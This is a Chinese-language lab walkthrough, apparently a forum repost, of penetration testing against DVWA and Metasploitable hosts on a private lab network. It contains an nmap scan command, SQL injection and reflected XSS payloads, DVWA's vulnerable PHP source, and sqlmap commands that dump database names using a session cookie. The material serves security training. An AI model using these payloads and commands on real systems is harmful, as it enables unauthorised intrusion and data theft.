关于渗透环境以及渗透工具的使用

实验测试 （1）概述 本次实验测试的主要目的为熟悉Web渗透工具的使用，漏洞的利用及了解渗透测试流程。 测试流程为 信息搜集-网络与主机扫描-漏洞利用-攒写报告 （2）实验测试范围 局域网192.168.0.0 网段中的DVWA主机和MSF靶机 （3）实验开始 1.信息搜集 使用Nmap扫描目标IP段 nmap -sS -P0 -sV -O 192.168.0.0/24 sS    SYN半开式扫描，扫描结果比默认扫描结果准确，扫描端口 -P0   关闭ping -sV   系统版本检测 -O   识别操作系统 存活主机12台 分析扫描结果以后判断出: 192.168.0.150 为DVWA地址 开放的常用端口有22，80，111，3306 根据开放的端口判断出所开启的服务 所使用的环境为LAMP（Linux，Apache，Mysql，PHP） 192.168.0.66 为 MSF靶机地址 开放的常用端口有21，22，23，25，53，80，139，445，3306，5432，8009，8180 根据开放的端口判断出开放的服务有 ftp文件传输协议 ssh远程链接 telnet远程连接 mysql数据库等服务 环境也是LAMAP（Linux，Apache，Mysql，PHP） 2.网络与主机扫描 DVWA地址 192.168.0.150 默认账户密码 admin password 登陆就行了。 首先我们对DVWA进行扫描，所使用到的工具有Burpsuite，Owasp-zap 我们就先上Brupsuite吧。   上Burpsuite 配置好代理，开启拦截 直接把请求丢到 Scanner模块里。 Burp的扫描有调优功能这里就不详细说了， 直接来看扫描结果。 扫描出来了 一个SQL注入，一个XSS跨站。  我们首先来看看sql注入。     看看他提交的payload数据包 和返回包 判断漏洞是否为误报。 Burp 测试sql注入的payload /vulnerabilities/sqli/?id=1’&Submit=Submit# 返回数据包 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 可以看到他数据库报错的信息 初步判断出为sql显注。 我们看一下他数据库的源代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) {     // Get input     $id = $_REQUEST[ 'id' ];     // Check database     $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";     $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );     // Get results     $num = mysql_numrows( $result );     $i   = 0;     while( $i < $num ) {         // Get values         $first = mysql_result( $result, $i, "first_name" );         $last  = mysql_result( $result, $i, "last_name" );         // Feedback for end user         echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";         // Increase loop count         $i++;     }     mysql_close(); } ?> 它首先得到一个ID参数的输入 然后把它带入到数据库中去查询 将所查询到的结果返回给用户 。 Sql注入漏洞的原理： 就是当攻击者能够操作数据，往应用程序中插入一些SQL语句时，SQL注入攻击就发生了”。黑客使原本的sql数据库查询语句发生歧义，把特殊的SQL 指令语句插入到系统实际SQL语句中并执行它, 以获取用户密码等敏感信息, 以及获取主机控制权限的攻击方法。 接下来是XSS跨站 看他提交的payload数据包 和返回包 判断漏洞是否为误报。 出弹窗了。 Burp 测试XSS跨站的payload /vulnerabilities/sqli/?id=1bjupn<script>alert(1)<%2fscript>dcwjj&Submit=Submit 返回数据包 <pre>ID: 1bjupn<script>alert(1)</script>dcwjj<br />First name: admin<br />Surname: admin</pre> 可以看出提交的javascript语句被执行 写入页面了 判断为反射型xss跨站 我们看一下他的源代码 <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {     // Feedback for end user     echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> 它只是简单的用了一个if语句判断有没有输入参数 然后将内容echo出来 XSS跨站脚本漏洞原理： XSS跨站脚本漏洞的产生是由于Web应用程序对用户的输入过滤不如而产生的，攻击者利用网站漏洞把恶意脚本代码（通常包括HTML代码和Javascript脚本）注入到网页之中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害者可能采取Cookie资料窃取，会话劫持，钓鱼欺骗等攻击。 接下来我们上Owasp-zap 上Owasp-zap配置好代理，直接把目标URL丢到 active scan模块里。 怎么折腾这里就不详细说了， 直接来看扫描结果 扫描出来了 一个SQL注入 一个XSS跨站。 首先我们来看看sql注入吧 看看他提交的payload数据包 和返回包 判断漏洞是否为误报。 Owasp测试sql注入的payload /vulnerabilities/sqli/?id=1%27+UNION+ALL+select+NULL+--+&Submit=Submit 返回数据包 he used SELECT statements have a different number of columns 可以看到他查询数据库内容时报错的信息 初步判断出为sql显注。 下面我们来看看xss跨站脚本       出弹窗了。 Owasp测试XSS跨站的payload /vulnerabilities/sqli/?id=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&Submit=Submit 返回数据包 <pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"<script>alert(1);</script>'' at line 1</pre> 可以看出提交的javascript语句被执行 写入页面了 判断为反射型xss跨站。 3.漏洞利用 DVWA Sql注入漏洞Low级 get 注入 注入点： http://192.168.0.150/vulnerabilities/sqli/?id=1&Submit=Submit 直接上Sqlmap Sqlmap语句： python sqlmap.py -u "http://192.168.0.150/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=955sq1mff2p6tis9hc5cieqvu6; security=low" --dbs -u 指定目标URL --cookie 指定cookie --dbs 枚举DBMS中的数据库 因为DVWA是登陆状态所以要加Burp拦截下的cookie 跑数据库名 跑出来了数据库信息 做白帽的话跑到这里就可以去提交漏洞了 不必再往下深入。 DVWA Sql注入漏洞medium级 post注入 我们直接把burp拦截下的数据包保存到桌面 然后sqlmap语句 python sqlmap.py -r /root/桌面/1 --dbs -r sqlmap加载我们的post请求1.txt文件 DVWA Sql注入漏洞hight级 post注入 我们直接把burp拦截下的数据包保存到桌面 然后sqlmap语句： python sqlmap.py -r /root/桌面/2 --second-order="http://192.168.0.150/vulnerabilities/sqli/" --dbs -r  sqlmap加载我们的post请求文件 second-order 啊，这个我也忘了 只是记得是这个参数 有兴趣的小伙伴下去了解了解吧 matesploit渗透我们下期再说吧。 呼呼 可算是写完了，今天的内容就到这里啦 感谢大家的收看。。。 本文来源；http://bbs.ichunqiu.com/thread-9637-1-1.html?from=csn-shan